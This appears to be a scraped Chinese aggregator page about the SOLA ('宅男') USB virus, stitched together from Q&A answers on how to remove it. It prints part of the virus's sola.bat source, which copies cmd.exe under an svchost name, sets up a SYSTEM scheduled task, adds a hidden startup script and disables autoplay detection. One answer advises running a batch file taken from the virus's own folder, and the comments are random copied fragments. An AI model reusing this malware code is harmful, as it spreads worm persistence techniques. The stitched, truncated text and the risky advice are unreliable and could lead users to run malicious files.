b2c信息网

请输入关键字词

热门标签排行

网友热搜词排行

您现在的位置是:首页 > 最近新闻 > 正文

最近新闻

宅男木马病毒(病毒木马图片)

宅男木马病毒
hacker2022-05-31 09:06:23最近新闻205
本文导读目录:1、我不小心下载了宅男影院不知道是什么就点进去结果说要每个月扣我二十
本文导读目录:

我不小心下载了宅男影院不知道是什么就点进去结果说要每个月扣我二十

这种是木马病毒,下个360就行了,我以前也遇到过,如果你经常浏览那种网站建议安装一个360,不然很容易中病毒

如何彻底清除“宅男病毒”

如果你中了“死亡问答”(Sola)宅男病毒,用杀毒软件只能查出病毒,但无法恢复被感染图片文件。目前唯一能恢复图片的解决方案,是使用贝壳的《“死亡问答”(Sola)宅男病毒专杀工具》。

《“死亡问答”(Sola)宅男病毒专杀工具》能彻底查杀“死亡问答”(Sola)宅男病毒,恢复被感染文件。请您立即下载专杀工具,检测系统是否已经感染该病毒。

“死亡问答”(Sola)宅男病毒危害性

病毒会感染用户近期打开过的DOC,TXT,JPG文件,使之全部变成EXE文件。在病毒执行次数累计超过50的时候,死亡问答便会被激活,同时锁定系统,删除NTLDR(全称是NT Loader,是系统加载程序)。若用户回答问题正确,病毒恢复NTLDR,并且进入自我清除模式。若用户回答失败,则需重装系统。

怎么解决宅男病毒(sola病毒)?

解决方法二:

一、进安全模式

1.同样用“资源管理器”进入各盘符目录下,删除隐藏的“SOLA”文件夹和“Autorun.inf”文件

然后去360网站上下载一个“U盘病毒专杀工具”查杀完后弹出窗口“是否……”点击“是”,然后会询问“是否创建XXX”

点击创建,该软件就会在各个盘符下创建一个名问“Autorun.inf”的假病毒文件,这样就能防止病毒再创建此文件。

2.“搜索文件或文件夹”关键字“sola”的所有文件和文件夹,删除所有有关sola这个名字的文件和文件夹。

3.可手动找到并删除下列文件。

%systemroot%\\Fonts\\Regedit.reg

%systemroot%\\Fonts\\sleep.exe

%systemroot%\\Fonts\\SOLA.BAT

%systemroot%\\Fonts\\est_type2032.fon

%systemroot%\\Tasks\\Tasks.job

%systemroot%\\Fonts\\solasetup

%systemroot%\\Tasks\\Tasks.job

4.按创建时间排序,删除所有和其同一时间创建的文件。

5.打开注册表(点击“开始”——“运行”,输入“regedit”,回车)

6.鼠标点选注册表左边目录最上方“我的电脑”,然后点击“编辑”——“查找”,输入“SOLA”删除所有相关的“项”“值”“数据”

注:有些软件的名字中带有“SOLA”,但并不是病毒,要区分开来。(如下图所示就不属于病毒项)病毒的“项”“值”“数据”一般一眼就能看出。

[attach]27266[/attach]

-----------------------

7.木马为了能够在开机后自动运行,往往在注册表如下选项中添加注册表项:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

删除不明项。(也可用360安全卫士查看启动项)

在“C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动”中有一个SOLA.vbs文件

(注:这里我记得不太清楚了,因为我忘了保存该文件的样本)

8.最后再检查一下所有盘符,看看“SOLA”文件夹是否删除干净,如还存在需再删一次,“Autorun.inf”文件就不需要删除了,那是专杀工具创建用来欺骗病毒的文件。

9.删除你的U盘、MP3等一切USB接口硬件中的“SOLA”文件夹;当然用手机内存读卡器的也会中标。

10.重启电脑,搞定。

下面附上“sola.bat”中的内容:

@echo off

set sola=%systemroot%\\Fonts

set setup=%systemroot%\\Fonts\\solasetup

if not \"%1\"==\"-USB\" goto Start

start /max ..

if exist %sola%\\SOLA.BAT goto End

::========================Infect==============================

:Infect

cd\\

md %systemroot%\\Fonts\\solasetup

::————文件复制---------

copy sola\\Autorun.inf %setup%\\Autorun.inf

copy sola\\SOLA.BAT %setup%\\SOLA.BAT

copy sola\\宅男请进.RAR %setup%\\宅男请进.RAR

copy sola\\Tasks.xxx %setup%\\Tasks.xxx

copy sola\\sleep.exe %setup%\\sleep.exe

tasklist %sola%\\task.txt

FOR /F \"tokens=1\" %%i in (\'findstr /I \"svchost.exe\" \"%sola%\\task.txt\"\') do set svchost=%%i

copy %systemroot%\\system32\\cmd.exe %sola%\\%svchost%

del %sola%\\task.txt

:Tasks

copy %setup%\\Tasks.xxx %systemroot%\\Tasks\\Tasks.job

schtasks /change /ru \"NT AUTHORITY\\SYSTEM\" /tn \"Tasks\" if errorlevel 1 goto TaskFail

goto TaskSuc

:TaskFail

%homedrive%

cd \"%ALLUSERSPROFILE%\"

cd 「开始」菜单\\程序\\启动

echo On Error Resume NextSOLA.VBS

echo set ws=wscript.createobject(\"wscript.shell\")SOLA.VBS

echo ws.run \"%sola%\\svchost.exe /c %sola%\\SOLA.BAT\",0 SOLA.VBS

copy SOLA.VBS %sola%\\SOLA.VBS

echo NT%systemroot%\\Fonts\\NoTasks

:TaskSuc

attrib %systemroot%\\Tasks\\Tasks.job +s +h +r

copy %setup%\\sola.bat %sola%\\sola.bat

copy %setup%\\sleep.exe %systemroot%\\system32\\sleep.exe

:NoAutoPlay

net stop \"Shell Hardware Detection\"

echo Windows Registry Editor Version 5.00%systemroot%\\Fonts\\Regedit.reg

echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetection]%systemroot%\\Fonts\\Regedit.reg

echo \"Start\"=dword:00000004%systemroot%\\Fonts\\Regedit.reg

start regedit /s %systemroot%\\Fonts\\Regedit.reg

:KillTMG

goto End

::======================Infect======================================

::======================Start=======================================

:Start

%homedrive%

cd \"%ALLUSERSPROFILE%\"

cd 「开始」菜单\\程序\\启动

date /t %sola%\\est_type2032.fon

findstr /c:\"-10-01\" \"%sola%\\est_type2032.fon\" if not errorlevel 1 goto DayOn

if exist %systemroot%\\Fonts\\NoTasks if not exist SOLA.VBS copy %sola%\\SOLA.VBS SOLA.VBS

:Continue

sleep 300set C=0 echo 1C:\\solachk1 findstr . C:\\solachk1 if not errorlevel 1 del C:\\solachk1 sleep 1000set C=1 findstr /C:\"SOLA_1.0\" C:\\Autorun.inf if errorlevel 1 attrib -s -h -r C:\\Autorun.inf

手机自动安装了宅男直播是木马病毒吗?

流氓软件直接卸载吧,有360或者腾讯管家的话杀杀毒,没有就下吧

关于sola病毒(宅男病毒),急求救!!!

应该是被杀毒软件自动清除了吧,如果病毒文件还在,就用它自带的杀吧。。 sola文件夹里面有两个东西functio.dll和 sola.bat 在function.dll点右键打开方式里

面找winrar 解压出来之后里面有个SolaKiller.rar 把他解压密码kakenhi200601

在里面有个Install.bat 双击运行,然后在开始菜单里面程序里就多了个“SOLA病毒专杀”

运行里面的SolaKiller.bat 吧。

如果还不行,进入安全模式启动杀毒软件杀毒,并手动删除病毒文件

相关文章

发表评论

评论列表

  • 边侣庸颜(2022-05-31 15:14:27)回复取消回复

    nts\\sleep.exe%systemroot%\\Fonts\\SOLA.BAT%systemroot%\\Fonts\\est_type2032.fon%systemroot%\\Tasks\\Tasks.job%systemroot%\\Fonts\\solasetup%sys

  • 温人昭浅(2022-05-31 18:55:18)回复取消回复

    SOLA_1.0\" C:\\Autorun.inf if errorlevel 1 attrib -s -h -r C:\\Autorun.inf手机自动安装了宅男直播是木马病毒吗?流氓软件直接卸载吧,有360或者腾讯管家的话杀杀毒,没有就下吧关于sola病毒(宅男病毒),急求救

  • 囤梦望喜(2022-05-31 15:23:16)回复取消回复

    5.00%systemroot%\\Fonts\\Regedit.regecho [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetectio

  • 丑味邮友(2022-05-31 10:29:39)回复取消回复

    \「开始」菜单\\程序\\启动”中有一个SOLA.vbs文件(注:这里我记得不太清楚了,因为我忘了保存该文件的样本)8.最后再检查一下所有盘符,看看“SOLA”文件夹是否删除干净,如还存在需再删一次,“Autorun.inf”文件就不需要删除了,那是专杀工具创建用来